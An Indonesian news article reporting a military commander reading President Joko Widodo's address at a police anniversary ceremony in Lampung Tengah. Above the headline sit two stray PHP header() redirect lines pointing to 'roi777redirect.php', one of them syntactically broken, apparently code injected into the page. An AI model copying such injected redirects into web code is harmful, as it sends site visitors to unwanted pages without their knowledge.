header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Ini Pidato Dandim 0411/LT saat Upacara HUT Bhayangkara di Mapolres Lamteng -
Ini Pidato Dandim 0411/LT saat Upacara HUT Bhayangkara di Mapolres Lamteng

TRANSLAMPUNG.COM, GUNUNGSUGIH – Komandan Kodim 0411/LT, Letkol CZI Burhannudin membacakan amanat Presiden Joko Widodo saat memimpin upacara HUT Bhayangkara ke 72 tahun, di Mapolres Lamteng, Rabu (11/7).

Isi amanat yang dibacakan tersebut, Presiden meminta Polri mampu mengedepankan tindakan penangkalan dan pencegahan.

“Petakan, deteksi dan antisipasi setiap potensi kerawanan yang ada, serta lakukan langkah penanganan yang tepat, agar tidak terjadi gangguan kamtibmas,” ucapnya.

Dengan demikian, seluruh kegiatan dapat berjalan lancar dan masyarakat dapat melaksanakan aktivitasnya dengan aman dan nyaman.

lebih lanjut, Dandim 0411/LT mengatakan bahwa sepanjang 72 tahun sejarah pengabdian Polri pada bangsa dan negara, Polri telah banyak berperan.

Memberikan sumbangsih yang sangat besar dalam upaya pemeliharaan keamanan dan ketertiban masyarakat, penegakan hukum, perlindungan, pengayoman.

“Kita semua juga telah menyaksikan berbagai prestasi yang telah diukir Polri, dalam mengemban tugas sebagai pemelihara keamanan dalam negeri,” imbuhnya.

Contoh keberhasilan Polri dalam penanganan di negara ini, adalah masalah terorisme. Lalu pemberantasan penyalahgunaan narkoba, pengungkapan kasus yang menjadi perhatian publik serta mengamankan berbagai agenda.

Baik yang bersifat nasional, maupun internasional. “Bahkan telah mendapat apresiasi dari pemerintah, masyarakat dan dunia internasional,” pungkasnya. (rls/rid)

News Reporter